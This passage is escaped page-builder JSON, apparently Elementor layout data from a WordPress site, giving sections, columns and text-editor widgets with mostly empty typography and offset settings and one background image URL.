hand.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"faaa0fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/Zoom-Conference-Room-Solutions_page2_image7.jpg\",\"id\":3048}},\"elements\":[{\"id\":\"886f41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a8a224a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"412feda\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3d2b744\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a34735d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5073c27\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ab21b4\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"533fe3c\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab89310\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fcc54ee\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3c1657b\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"column_gap_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_size\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"drop_cap_space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"drop_cap_border_radius\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"drop_cap_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"406125c\",\"elType\":\"widget\",\"settings\":{\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_letter_spacing_tablet\":{\